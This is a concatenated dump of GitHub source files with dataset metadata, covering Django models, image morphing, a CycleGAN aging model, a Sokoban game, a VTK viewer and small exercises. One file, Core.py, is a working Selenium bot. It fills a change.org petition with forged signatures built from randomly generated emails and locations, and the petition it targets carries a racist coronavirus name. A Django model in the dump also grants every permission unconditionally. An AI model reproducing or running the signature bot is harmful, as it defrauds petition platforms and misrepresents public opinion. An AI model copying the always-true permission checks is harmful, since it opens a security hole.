email[-3:]\n else:\n return re.sub(r'[^@.]', '*', email)[2:-3] + email[-3:]\n\n def has_perm(self, perm, obj=None):\n return True\n\n def has_module_perms(self, app_label):\n return True\n\n @property\n def is_admin(self):\n return self.user_type == 'admin'\n\n @property\n def is_project_admin(self):\n return self.user_type == 'project_admin'\n\n @property\n def is_engineer(self):\n return self.user_type == 'engineer'\n\n @property\n def is_government(self):\n return self.user_type == 'government'\n\n @property\n def is_user(self):\n return self.user_type == 'user'\n\n @property\n def is_active(self):\n return self.active\n","repo_name":"ISAC-SIMO/ISAC-SIMO-Django-Backend","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8588,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"23999250785","text":"'''\r\nОпределить количество различных подстрок с использованием хеш-функции.\r\nДана строка S длиной N, состоящая только из строчных латинских букв.\r\nТребуется найти количество подстрок в этой строке.\r\n'''\r\n\r\nimport hashlib\r\n\r\ndef my_hash(value):\r\n letter=26\r\n index=0\r\n size=10000\r\n\r\n for i,char in enumerate(value):\r\n index+=(ord(char)-ord('a')+1)*letter**i\r\n\r\n hashlib.sha1(value.encode('utf-8')).hexdigest()\r\n\r\n return index%size\r\n\r\ns=\"buddy\"\r\nslog=[]\r\ns_t=set()\r\ni=0\r\ni1=0\r\nlen_s=len(s)\r\n\r\nunder_string=set()\r\nwhile i<=len_s:\r\n i1=0\r\n while i1<=len_s:\r\n s_t.add(my_hash(s[i:i1]))\r\n i1+=1\r\n i += 1\r\n if 
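# ---- Illustrative sketch (added; not part of the original source) ----
# get_hidden_email builds its mask from a negated character class: every
# character except '@' and '.' becomes '*', so the shape of the address is
# preserved while the letters are hidden. The core of that trick:
import re

assert re.sub(r'[^@.]', '*', 'alice.smith@example.org') == '*****.*****@*******.***'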
i<len_s:\r\n s_t.add(my_hash(s[i]))\r\n\r\nprint(f'Количество подстрок {len(s_t)-2} в строке: {s}')\r\n","repo_name":"DomenZero/Tasks_Python_9","sub_path":"les_9_task_1.py","file_name":"les_9_task_1.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23636878321","text":"from string import maketrans\r\n\r\na = 'ejp mysljylc kd kxveddknmc re jsicpdrysi'\r\nb = 'rbcpc ypc rtcsra dkh wyfrepkym veddknkmkrkcd'\r\nc = 'de kr kd eoya kw aej tysr re ujdr lkgc jv'\r\nx = 'our language is impossible to understand'\r\ny = 'there are twenty six factorial possibilities'\r\nz = 'so it is okay if you want to just give up'\r\n\r\nd = {'q':'z', 'z':'q'}\r\nfor i in range(len(a)):\r\n d[a[i]] = x[i]\r\nfor i in range(len(b)):\r\n d[b[i]] = y[i]\r\nfor i in range(len(c)):\r\n d[c[i]] = z[i]\r\n\r\nf = ''\r\nt = ''\r\nfor i in range(26):\r\n f += chr(ord('a')+i)\r\n t += d[f[i]]\r\ntrans = maketrans(f, t)\r\n\r\ninfile = open('a.in', 'r')\r\noutfile = open('a.out', 'w')\r\n \r\nn = int(infile.readline())\r\nfor i in range(n):\r\n s = infile.readline()\r\n outfile.write('Case #{0}: {1}'.format(i+1, s.translate(trans)))\r\ninfile.close()\r\noutfile.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_95/928.py","file_name":"928.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10803824317","text":"import numpy as np\nimport cv2\nimport dlib\nfrom scipy.spatial import Delaunay\nimport sys\n\npredictor_model = 'shape_predictor_68_face_landmarks.dat'\n\n\ndef get_points(image):\n \"\"\"\n 用 dlib 获取面部特征点\n \"\"\"\n face_detector = dlib.get_frontal_face_detector()\n face_pose_predictor = dlib.shape_predictor(predictor_model)\n try:\n detected_face = face_detector(image, 1)[0]\n except:\n print('No face detected in image {}'.format(image))\n pose_landmarks = face_pose_predictor(image, detected_face)\n points = []\n for p in pose_landmarks.parts():\n points.append([p.x, p.y])\n\n # 加入四个顶点和四条边的中点\n x = image.shape[1] - 1\n y = image.shape[0] - 1\n points.append([0, 0])\n points.append([x // 2, 0])\n points.append([x, 0])\n points.append([x, y // 2])\n points.append([x, y])\n points.append([x // 2, y])\n points.append([0, y])\n points.append([0, y // 2])\n\n return np.array(points)\n\n\ndef get_triangles(points):\n \"\"\"\n 在特征点上使用 Delaunay 三角剖分\n \"\"\"\n return Delaunay(points).simplices\n\n\ndef affine_transform(input_image, input_triangle, output_triangle, size):\n \"\"\"\n 仿射变换\n \"\"\"\n warp_matrix = cv2.getAffineTransform(\n np.float32(input_triangle), np.float32(output_triangle))\n output_image = cv2.warpAffine(input_image, warp_matrix, (size[0], size[1]), None,\n flags=cv2.INTER_LINEAR, borderMode=cv2.BORDER_REFLECT_101)\n return output_image\n\n\ndef morph_triangle(img1, img2, img, tri1, tri2, tri, alpha):\n \"\"\"\n 三角形变形,Alpha 混合\n \"\"\"\n # 计算三角形的边界框\n rect1 = cv2.boundingRect(np.float32([tri1]))\n rect2 = cv2.boundingRect(np.float32([tri2]))\n rect = cv2.boundingRect(np.float32([tri]))\n\n tri_rect1 = []\n tri_rect2 = []\n tri_rect_warped = []\n\n for i in range(0, 3):\n tri_rect_warped.append(\n ((tri[i][0] - rect[0]), (tri[i][1] - rect[1])))\n tri_rect1.append(\n ((tri1[i][0] - rect1[0]), (tri1[i][1] - rect1[1])))\n tri_rect2.append(\n ((tri2[i][0] - rect2[0]), (tri2[i][1] - rect2[1])))\n\n # 在边界框内进行仿射变换\n img1_rect = img1[rect1[1]:rect1[1] +\n rect1[3], 
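# ---- Illustrative sketch (added; not part of the original source) ----
# The substring-counting script above stores a small custom hash
# (a base-26 index taken mod 10000) in a set, so distinct substrings can
# collide and be undercounted. Exact counting only needs the substrings
# themselves in a set (Python hashes strings safely); there are O(n^2)
# substrings for a string of length n:
def count_distinct_substrings(s):
    return len({s[i:j] for i in range(len(s)) for j in range(i + 1, len(s) + 1)})

assert count_distinct_substrings('buddy') == 14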
rect1[0]:rect1[0] + rect1[2]]\n img2_rect = img2[rect2[1]:rect2[1] +\n rect2[3], rect2[0]:rect2[0] + rect2[2]]\n\n size = (rect[2], rect[3])\n warped_img1 = affine_transform(\n img1_rect, tri_rect1, tri_rect_warped, size)\n warped_img2 = affine_transform(\n img2_rect, tri_rect2, tri_rect_warped, size)\n\n # 加权求和\n img_rect = (1.0 - alpha) * warped_img1 + alpha * warped_img2\n\n # 生成蒙版\n mask = np.zeros((rect[3], rect[2], 3), dtype=np.float32)\n cv2.fillConvexPoly(mask, np.int32(tri_rect_warped), (1.0, 1.0, 1.0), 16, 0)\n\n # 应用蒙版\n img[rect[1]:rect[1] + rect[3], rect[0]:rect[0] + rect[2]] = \\\n img[rect[1]:rect[1] + rect[3], rect[0]:rect[0] +\n rect[2]] * (1 - mask) + img_rect * mask\n\n\ndef morph_faces(filename1, filename2, alpha=0.5):\n \"\"\"\n 融合图片\n \"\"\"\n img1 = cv2.imread(filename1)\n img2 = cv2.imread(filename2)\n\n points1 = get_points(img1)\n points2 = get_points(img2)\n points = (1 - alpha) * np.array(points1) + alpha * np.array(points2)\n\n img1 = np.float32(img1)\n img2 = np.float32(img2)\n img_morphed = np.zeros(img1.shape, dtype=img1.dtype)\n\n triangles = get_triangles(points)\n for i in triangles:\n x = i[0]\n y = i[1]\n z = i[2]\n\n tri1 = [points1[x], points1[y], points1[z]]\n tri2 = [points2[x], points2[y], points2[z]]\n tri = [points[x], points[y], points[z]]\n morph_triangle(img1, img2, img_morphed, tri1, tri2, tri, alpha)\n\n return np.uint8(img_morphed)\n\n\nif __name__ == '__main__':\n filename1 = sys.argv[1]\n filename2 = sys.argv[2]\n try:\n alpha = float(sys.argv[3])\n except:\n alpha = 0.5\n img_morphed = morph_faces(filename1, filename2, alpha)\n output_file = '{}_{}_{}.jpg'.format(\n filename1.split('.')[0], filename2.split('.')[0], alpha)\n cv2.imwrite(output_file, img_morphed)\n","repo_name":"WeiJiHsiao/face_morpher","sub_path":"face_morhper.py","file_name":"face_morhper.py","file_ext":"py","file_size_in_byte":4223,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"61"} +{"seq_id":"16393582510","text":"import itertools\nimport os\nimport pytorch_lightning as pl\nimport torch\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom torchvision.utils import make_grid\n\nfrom dataset import ImagetoImageDataset\nfrom models import Generator, Discriminator\n\n\nclass AgingGAN(pl.LightningModule):\n\n def __init__(self, config):\n super(AgingGAN, self).__init__()\n self.config = config\n self.genA2B = Generator(config['ngf'], n_residual_blocks=config['n_blocks'])\n self.genB2A = Generator(config['ngf'], n_residual_blocks=config['n_blocks'])\n self.disGA = Discriminator(config['ndf'])\n self.disGB = Discriminator(config['ndf'])\n\n # cache for generated images\n self.generated_A = None\n self.generated_B = None\n self.real_A = None\n self.real_B = None\n\n def forward(self, x):\n return self.genA2B(x) #에이징\n # return self.genB2A(x) #디에이징\n\n def training_step(self, batch, batch_idx, optimizer_idx):\n real_A, real_B = batch\n\n if optimizer_idx == 0:\n # Identity loss\n # G_A2B(B) should equal B if real B is fed\n same_B = self.genA2B(real_B)\n # same_B = self.genB2A(real_B)\n loss_identity_B = F.l1_loss(same_B, real_B) * self.config['identity_weight']\n # G_B2A(A) should equal A if real A is fed\n same_A = self.genB2A(real_A)\n # same_A = self.genA2B(real_A)\n loss_identity_A = F.l1_loss(same_A, real_A) * self.config['identity_weight']\n\n # GAN loss\n fake_B = self.genA2B(real_A)\n # fake_B = self.genB2A(real_A)\n pred_fake = self.disGB(fake_B)\n 
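# ---- Illustrative sketch (added; not part of the original source) ----
# morph_triangle above warps each Delaunay triangle independently: an affine
# map is fitted to the three corner pairs, applied inside the triangle's
# bounding box, and blended in with a convex-polygon mask. A minimal
# standalone version of that per-triangle step on a toy 60x60 image:
import numpy as np
import cv2

src = np.zeros((60, 60, 3), np.uint8)
cv2.circle(src, (20, 20), 8, (255, 255, 255), -1)

tri_src = np.float32([[5, 5], [50, 10], [20, 50]])
tri_dst = np.float32([[10, 5], [55, 20], [15, 55]])

M = cv2.getAffineTransform(tri_src, tri_dst)           # 2x3 affine from 3 point pairs
warped = cv2.warpAffine(src, M, (60, 60), flags=cv2.INTER_LINEAR,
                        borderMode=cv2.BORDER_REFLECT_101)

mask = np.zeros((60, 60, 3), np.float32)
cv2.fillConvexPoly(mask, np.int32(tri_dst), (1.0, 1.0, 1.0), 16, 0)
out = (warped * mask).astype(np.uint8)                 # this triangle's contribution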
loss_GAN_A2B = F.mse_loss(pred_fake, torch.ones(pred_fake.shape).type_as(pred_fake)) * self.config[\n 'adv_weight']\n\n fake_A = self.genB2A(real_B)\n # fake_A = self.genA2B(real_B)\n pred_fake = self.disGA(fake_A)\n loss_GAN_B2A = F.mse_loss(pred_fake, torch.ones(pred_fake.shape).type_as(pred_fake)) * self.config[\n 'adv_weight']\n\n # Cycle loss\n recovered_A = self.genB2A(fake_B)\n # recovered_A = self.genA2B(fake_B)\n loss_cycle_ABA = F.l1_loss(recovered_A, real_A) * self.config['cycle_weight']\n\n recovered_B = self.genA2B(fake_A)\n # recovered_B = self.genB2A(fake_A)\n loss_cycle_BAB = F.l1_loss(recovered_B, real_B) * self.config['cycle_weight']\n\n # Total loss\n g_loss = loss_identity_A + loss_identity_B + loss_GAN_A2B + loss_GAN_B2A + loss_cycle_ABA + loss_cycle_BAB\n\n output = {\n 'loss': g_loss,\n 'log': {'Loss/Generator': g_loss}\n }\n self.generated_B = fake_B\n self.generated_A = fake_A\n\n self.real_B = real_B\n self.real_A = real_A\n\n # Log to tb\n if batch_idx % 500 == 0:\n self.logger.experiment.add_image('Real/A', make_grid(self.real_A, normalize=True, scale_each=True),\n self.current_epoch)\n self.logger.experiment.add_image('Real/B', make_grid(self.real_B, normalize=True, scale_each=True),\n self.current_epoch)\n self.logger.experiment.add_image('Generated/A',\n make_grid(self.generated_A, normalize=True, scale_each=True),\n self.current_epoch)\n self.logger.experiment.add_image('Generated/B',\n make_grid(self.generated_B, normalize=True, scale_each=True),\n self.current_epoch)\n return output\n\n if optimizer_idx == 1:\n # Real loss\n pred_real = self.disGA(real_A)\n loss_D_real = F.mse_loss(pred_real, torch.ones(pred_real.shape).type_as(pred_real))\n\n # Fake loss\n fake_A = self.generated_A\n pred_fake = self.disGA(fake_A.detach())\n loss_D_fake = F.mse_loss(pred_fake, torch.zeros(pred_fake.shape).type_as(pred_fake))\n\n # Total loss\n loss_D_A = (loss_D_real + loss_D_fake) * 0.5\n\n # Real loss\n pred_real = self.disGB(real_B)\n loss_D_real = F.mse_loss(pred_real, torch.ones(pred_real.shape).type_as(pred_real))\n\n # Fake loss\n fake_B = self.generated_B\n pred_fake = self.disGB(fake_B.detach())\n loss_D_fake = F.mse_loss(pred_fake, torch.zeros(pred_fake.shape).type_as(pred_fake))\n\n # Total loss\n loss_D_B = (loss_D_real + loss_D_fake) * 0.5\n d_loss = loss_D_A + loss_D_B\n output = {\n 'loss': d_loss,\n 'log': {'Loss/Discriminator': d_loss}\n }\n return output\n\n def configure_optimizers(self):\n g_optim = torch.optim.Adam(itertools.chain(self.genA2B.parameters(), self.genB2A.parameters()),\n lr=self.config['lr'], betas=(0.5, 0.999),\n weight_decay=self.config['weight_decay'])\n d_optim = torch.optim.Adam(itertools.chain(self.disGA.parameters(),\n self.disGB.parameters()),\n lr=self.config['lr'],\n betas=(0.5, 0.999),\n weight_decay=self.config['weight_decay'])\n return [g_optim, d_optim], []\n\n def train_dataloader(self):\n train_transform = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.Resize((self.config['img_size'] + 30, self.config['img_size'] + 30)),\n transforms.RandomCrop(self.config['img_size']),\n transforms.ToTensor(),\n transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))\n ])\n dataset = ImagetoImageDataset(self.config['domainA_dir'], self.config['domainB_dir'], train_transform)\n return DataLoader(dataset,\n batch_size=self.config['batch_size'],\n num_workers=self.config['num_workers'],\n shuffle=True)\n\n##########추가한거###################\n # def save_weights(self, path):\n # name = '1.pth'\n # full_path = 
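# ---- Illustrative sketch (added; not part of the original source) ----
# training_step above is a least-squares GAN (LSGAN): discriminator outputs
# are regressed with MSE toward 1 for real and 0 for fake instead of using
# BCE. The repeated pattern can be factored into one helper:
import torch
import torch.nn.functional as F

def lsgan_loss(pred, is_real):
    target = torch.ones_like(pred) if is_real else torch.zeros_like(pred)
    return F.mse_loss(pred, target)

pred_fake = torch.rand(4, 1, 30, 30)           # a PatchGAN-style output map
g_adv = lsgan_loss(pred_fake, True)            # generator wants fakes scored real
d_fake = lsgan_loss(pred_fake.detach(), False) # discriminator scores them fake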
os.path.join(path, name)\n # torch.save(self.state_dict(), full_path)\n\n def save_weights(self, path):\n generator_state_dict = self.genA2B.state_dict()\n discriminator_state_dict = self.disGB.state_dict()\n state_dict = {\n 'genA2B': generator_state_dict,\n 'disGB': discriminator_state_dict\n }\n torch.save(state_dict, os.path.join('./teamproject-cycle/pretrained_model/state_dict_korea_aging.pth'))\n\n def load_weights(self, path):\n checkpoint = torch.load(os.path.join('./teamproject-cycle/pretrained_model/state_dict_korea_aging.pth'))\n generator_state_dict = checkpoint['genA2B']\n discriminator_state_dict = checkpoint['disGB']\n self.genA2B.load_state_dict(generator_state_dict)\n self.disGB.load_state_dict(discriminator_state_dict)","repo_name":"rlaxoghd0513/study","sub_path":"팀프로젝트/teamproject-cycle/gan_module.py","file_name":"gan_module.py","file_ext":"py","file_size_in_byte":7398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38160478780","text":"import time\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import Select\n\nemail_generator = \"https://www.randomlists.com/email-addresses\"\nlocation_generator = \"https://www.randomlists.com/random-zip-codes\"\n# Jack's 2K Target\n# petition = \"https://www.change.org/p/nba-2k-fire-ronnie-for-false-advertising\"\npetition = \"https://www.change.org/p/world-health-organization-change-the-coronavirus-name-to-the-kung-flu\"\n\nlog = False # Track Program Progress\nusers = False # View Info Generated\ntiming = True # Time to Execute Block\nprogress = True # Visual\ngen = True # Basic Markers\nmax_email = 15\n\nstart_time = time.time()\nchrome_options = Options()\nchrome_options.add_argument(\"--headless\")\nchrome_options.add_argument(\"--incognito\")\ndriver = webdriver.Chrome(options=chrome_options)\nemails = []\n\n\n# Complie email list\nif gen:\n print(\"\\ngenerating emails...\")\nemail_start_time = time.time()\ndriver.get(email_generator)\ndriver.find_element_by_xpath('//*[@id=\"rand_options_qty\"]').clear()\ndriver.find_element_by_xpath('//*[@id=\"rand_options_qty\"]').send_keys(max_email)\ndriver.find_element_by_xpath('/html/body/div/div[1]/main/article/div[3]/aside/p/button').click()\nemail_lst = driver.find_elements_by_tag_name(\"li\")\ncount = 0\nfor email in email_lst:\n if 4 < count < len(email_lst) - 6:\n emails.append(email.text)\n count += 1\nif log:\n print(str(len(emails)) + \" emails generated\\n\\n\\n\")\ndriver.close()\nif timing:\n print(\" emails generated in \" + str(time.time() - email_start_time) + \" seconds!\")\n print(\" avg: \" + str((time.time() - email_start_time) / len(emails)) + \" seconds per email.\")\n\n\n# Compile location list and sub-elements\nif gen:\n print(\"generating locations...\")\nlocation_start_time = time.time()\nlocation_randomizer = webdriver.Chrome(options=chrome_options)\nlocation_randomizer.get(location_generator)\nlocation_randomizer.find_element_by_xpath('//*[@id=\"rand_options_qty\"]').clear()\nlocation_randomizer.find_element_by_xpath('//*[@id=\"rand_options_qty\"]').send_keys(len(emails))\nlocation_randomizer.find_element_by_xpath('/html/body/div/div[1]/main/article/div[3]/aside/p/button').click()\nzip_codes = location_randomizer.find_elements_by_class_name(\"rand_large\")\ncities_states = location_randomizer.find_elements_by_class_name(\"rand_medium\")\nif timing:\n print(\" locations generated in \" + str(time.time() - location_start_time) + 
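# ---- Illustrative sketch (added; not part of the original source) ----
# save_weights/load_weights above bundle two sub-module state_dicts into one
# checkpoint file. Round-trip of that pattern with throwaway modules and a
# temporary path:
import os
import tempfile
import torch
import torch.nn as nn

gen, dis = nn.Linear(4, 4), nn.Linear(4, 1)
path = os.path.join(tempfile.gettempdir(), 'state_dict_demo.pth')
torch.save({'genA2B': gen.state_dict(), 'disGB': dis.state_dict()}, path)

ckpt = torch.load(path)
gen.load_state_dict(ckpt['genA2B'])
dis.load_state_dict(ckpt['disGB'])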
\" seconds!\")\n print(\" avg: \" + str((time.time() - location_start_time) / len(zip_codes)) + \" seconds per location.\")\n\n\n# Post generated info to Change.org petition\nif gen:\n print(\"posting to website...\")\nposting_start_time = time.time()\nemail_count = 0\nfor email in emails:\n if progress and (email_count + 1) % 10 == 0:\n print('#')\n elif progress:\n print('#', end=\"\", flush=True)\n if log and email_count == 0:\n print(\"booting up driver...\")\n elif log:\n print(\"rebooting driver...\")\n driver = webdriver.Chrome(options=chrome_options)\n driver.get(petition)\n if log:\n print(\"generating signature \" + str(email_count + 1) + \" out of \" + str(len(emails)))\n first_input = driver.find_element_by_id(\"firstName\")\n last_input = driver.find_element_by_id(\"lastName\")\n email_input = driver.find_element_by_id(\"email\")\n name = email.partition(\"@\")[0]\n first_name, last_name = name[:len(name) // 2], name[len(name) // 2:]\n\n first_input.send_keys(first_name)\n last_input.send_keys(last_name)\n email_input.send_keys(str(email))\n driver.find_element_by_xpath('//*[@id=\"public\"]').click() # don't show info\n\n driver.find_element_by_xpath('//*[@id=\"page\"]/div[1]/div[3]/div[2]/div/div/div/div[2]/div[2]/form/button[1]/div/div/div[2]/div/div/div').click() # open location editor\n Select(driver.find_element_by_xpath('//*[@id=\"countryCode\"]')).select_by_value('US')\n zip_code = zip_codes[email_count].text\n city_state = str(cities_states[email_count].text).partition(', ')\n state = city_state[2]\n city = city_state[0]\n Select(driver.find_element_by_xpath('//*[@id=\"stateCode\"]')).select_by_visible_text(state)\n driver.find_element_by_xpath('//*[@id=\"city\"]').send_keys(city)\n driver.find_element_by_xpath('//*[@id=\"postalCode\"]').send_keys(zip_code)\n\n driver.find_element_by_xpath('//*[@id=\"page\"]/div[1]/div[3]/div[2]/div/div/div/div[2]/div[2]/form/button').click() # submit\n if users:\n print(\"USER \" + str(email_count + 1))\n print(\" first name: \" + str(first_name))\n print(\" last name: \" + str(last_name))\n print(\" email: \" + str(email))\n print(\" state: \" + str(state))\n print(\" zip: \" + str(zip_code))\n print(\" city: \" + str(city) + \"\\n\")\n email_count += 1\n driver.close()\nlocation_randomizer.close()\nif timing:\n print(\"\", flush=False)\n print(\" posting completed in \" + str(time.time() - posting_start_time) + \" seconds!\")\n print(\" avg: \" + str((time.time() - posting_start_time) / len(emails)) + \" seconds per signature.\")\n\nif gen:\n if not timing:\n print(\"\", flush=False)\n print(str(len(emails)) + \" signatures forged in \" + str(time.time() - start_time) + \" seconds!\")\n\n\n'''\nRuntime\n 10 entries\n - \n - \n - \n'''\n","repo_name":"Joftus/Bots4Change","sub_path":"Core.py","file_name":"Core.py","file_ext":"py","file_size_in_byte":5301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41098424216","text":"\n# use for run some tests on methods\n\n\ndef foo(arg1: int =1):\n if hasattr(int,'arg1'):\n print('hasattr')\n else:\n print('not hasattr')\n print(arg1)\n\n\ndef main():\n # foo()\n # print(type(foo))\n\n test_quicksort()\n\n\n\n\ndef test_quicksort(cases: int = 20):\n import test\n import sorts\n for i in range(cases):\n lst = test.random_array()\n # print('lst: ',lst)\n lstcopy = lst[:]\n sorts.quicksort(lstcopy,0,len(lstcopy))\n print('sorted lst: ',lstcopy)\n test.equal_list(lstcopy,sorted(lst))\n\n print('{ message: no other things means 
everything is ok! }')\n\n lst = [2,1,2,2,2,2,2,2,2]\n sorts.quicksort(lst,0,len(lst))\n print('lst: ',lst)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"15814/algorithm","sub_path":"sorts/test_scripts.py","file_name":"test_scripts.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74796599234","text":"import search_board\n\ndef sokoban_load_levels(filename):\n \"\"\"\n Loads all sokoban levels from a file.\n The levels have to be seperated with a new line.\n \"\"\"\n level_list = []\n board = []\n with open(filename) as level_file: # open file\n y_axis = 0 # current y_axis we are on.\n for line in level_file: # for every line in file\n if line == \"\\n\": # if the current line is a \"new line\", we reached a new level. Save current level to level list and reset the temp lists.\n level_list.append(board)\n board = []\n y_axis = 0 # reset y_axis\n objects_in_line = list(line) #convert the current line in to a list\n for x, obj in enumerate(objects_in_line): # go through each object in the list\n if obj not in \"\\n \": #if the object is not a new line, add it to correct temp list\n add_to_objectlist(obj, x, y_axis,board)\n\n y_axis += 1 #increment y_axis because we are moving down a line in the file\n return level_list\n\ndef sokoban_load(level, level_list):\n \"\"\"\n Loads a level from level_list\n Index - 0 - 48\n \"\"\"\n\n if len(level_list) > 0: #make sure we have a list with levels in them\n amount_of_boxes = 0 #amount of boxes in level\n temp_list = level_list[level] #get the level requested from level_list and put it in a temp list.\n for tile in temp_list: #go through each tile in the level\n if \"o\" in tile: #if there is a box on the tile\n amount_of_boxes += 1\n\n return temp_list, amount_of_boxes #return the level requested and the amount_of_boxes in level\n\ndef add_to_objectlist(obj, x, y, board):\n \"\"\"\n Adds the current object to the board\n \"\"\"\n\n if obj == '#' or obj == '@' or obj =='o' or obj=='.' 
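# ---- Illustrative sketch (added; not part of the original source) ----
# test_quicksort above is a randomized oracle test: sort many random arrays
# and compare against the built-in sorted(). A self-contained equivalent
# (the project's own `test`/`sorts` helpers replaced with stdlib calls):
import random

def oracle_test(sort_fn, cases=20):
    for _ in range(cases):
        lst = [random.randint(0, 100) for _ in range(random.randint(0, 30))]
        assert sort_fn(list(lst)) == sorted(lst), lst

oracle_test(lambda xs: sorted(xs))   # stands in for sorts.quicksort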
:\n board.append([obj, x, y])\n\ndef max_x_y(board):\n \"\"\"Finds the boundaries of the level\"\"\"\n x_highest = 0\n y_highest = 0\n\n for obj in board:\n # make sure obj is a wall\n if obj[0] == \"#\":\n # if obj x is higher than current x highest\n if x_highest < obj[1]:\n x_highest = obj[1]\n # if obj y is higher than current y highest\n if y_highest < obj[2]:\n y_highest = obj[2]\n\n return x_highest + 1, y_highest + 1\n\ndef sokoban_display(board):\n \"\"\"Displays the board\"\"\"\n x_max, y_max = max_x_y(board) #find the boundaries of the level\n\n visual_board = \"\"\n\n for y in range(y_max): #go from top line of level to bottom\n for x in range(x_max): #go from left to right in level\n items_to_print = search_board.find_in_board(x, y, board) #find all objects on the current tile of the level\n if len(items_to_print) == 1: #if there is only one item on the tile\n print(items_to_print[0][0], end = '') #print the item\n elif len(items_to_print) == 2: #if there is two items on the tile\n for items in items_to_print: #go through the items and print the correct symbol\n if \"@\" in items: #if player is standing on a storage area\n print(\"+\", end = '')\n elif \"o\" in items: #if a box is on a storage area\n print(\"*\", end = '')\n else: #if there is nothing on the tile\n print(\" \", end = '')\n\n print(\"\")\n\ndef isGameOver(level, objectives):\n \"\"\"\n Checks if the game is over.\n \"\"\"\n\n correct_boxes = 0\n\n for tile in level: #go through each tile in level\n if \"o\" in tile: #if there is a box on tile\n list_of_items = search_board.find_in_board(tile[1], tile[2], level) #find all items on the tile\n if len(list_of_items) > 1: #if there is two items on tile\n for item in list_of_items:\n if \"o\" in item: #is the box on a storage area?\n correct_boxes += 1\n\n return correct_boxes == objectives\n","repo_name":"diblaze/TDP002","sub_path":"4/gameboard.py","file_name":"gameboard.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26383352181","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nSimple VTK Viewer.\n\nExample:\n\n$ viewer.py -f head.vtk\n\"\"\"\nfrom optparse import OptionParser\nimport sys\n\nimport vtk\nfrom PyQt5.QtWidgets import QGridLayout, QDialog, QPushButton, QApplication\nimport vtk.qt\nvtk.qt.QVTKRWIBase = 'QGLWidget'\nfrom vtk.qt.QVTKRenderWindowInteractor import QVTKRenderWindowInteractor\n\n\nclass QVTKViewer(QDialog):\n \"\"\"\n Simple VTK Viewer.\n \"\"\"\n\n def initUI(self):\n\n grid = QGridLayout()\n self.vtkWidget = QVTKRenderWindowInteractor(self)\n grid.addWidget(self.vtkWidget, 0, 0, 1, 1)\n\n btn_close = QPushButton(\"close\", self)\n btn_close.clicked.connect(self.close)\n grid.addWidget(btn_close, 1, 0, 1, 1)\n\n self.setLayout(grid)\n self.setWindowTitle('VTK Viewer')\n self.show()\n\n def __init__(self, vtk_filename):\n \"\"\"\n Initiate Viwer\n\n Parameters\n ----------\n vtk_filename : str\n Input VTK filename\n \"\"\"\n\n QDialog.__init__(self)\n self.initUI()\n\n ren = vtk.vtkRenderer()\n self.vtkWidget.GetRenderWindow().AddRenderer(ren)\n iren = self.vtkWidget.GetRenderWindow().GetInteractor()\n\n # VTK file\n reader = vtk.vtkUnstructuredGridReader()\n reader.SetFileName(vtk_filename)\n reader.Update()\n\n # VTK surface\n surface = vtk.vtkDataSetSurfaceFilter()\n surface.SetInputConnection(reader.GetOutputPort())\n surface.Update()\n\n mapper = vtk.vtkDataSetMapper()\n 
mapper.SetInputConnection(surface.GetOutputPort())\n\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n actor.GetProperty().EdgeVisibilityOn()\n actor.GetProperty().SetEdgeColor(1, 1, 1)\n actor.GetProperty().SetLineWidth(0.5)\n ren.AddActor(actor)\n\n # annot. cube\n axesActor = vtk.vtkAnnotatedCubeActor()\n axesActor.SetXPlusFaceText('R')\n axesActor.SetXMinusFaceText('L')\n axesActor.SetYMinusFaceText('H')\n axesActor.SetYPlusFaceText('F')\n axesActor.SetZMinusFaceText('A')\n axesActor.SetZPlusFaceText('P')\n axesActor.GetTextEdgesProperty().SetColor(1, 1, 0)\n axesActor.GetCubeProperty().SetColor(0, 0, 1)\n self.axes = vtk.vtkOrientationMarkerWidget()\n self.axes.SetOrientationMarker(axesActor)\n self.axes.SetInteractor(iren)\n self.axes.EnabledOn()\n self.axes.InteractiveOn()\n\n ren.ResetCamera()\n iren.Initialize()\n\n\nusage = '%prog [options]\\n' + __doc__.rstrip()\nhelp = {\n 'in_file': 'input VTK file with unstructured mesh',\n}\n\n\ndef main():\n parser = OptionParser(description='Simple VTK Viewer')\n parser.add_option('-f','--filename', action='store',\n dest='in_filename', default=None,\n help=help['in_file'])\n (options, args) = parser.parse_args()\n\n if options.in_filename is None:\n raise IOError('No VTK data!')\n\n app = QApplication(sys.argv)\n viewer = QVTKViewer(options.in_filename)\n viewer.show()\n sys.exit(app.exec_())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vlukes/dicom2fem","sub_path":"dicom2fem/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"61"} +{"seq_id":"1778495029","text":"from nevow import rend, inevow\nfrom oauthlib.oauth2 import InvalidClientError\n\nfrom exe.webui.renderable import Renderable\n\nclass ProcomunOauth(Renderable, rend.Page):\n CLIENT_ID = '1Zl5ATaKchp8hecNGGhpfvQnUZaRTxkS'\n CLIENT_SECRET = 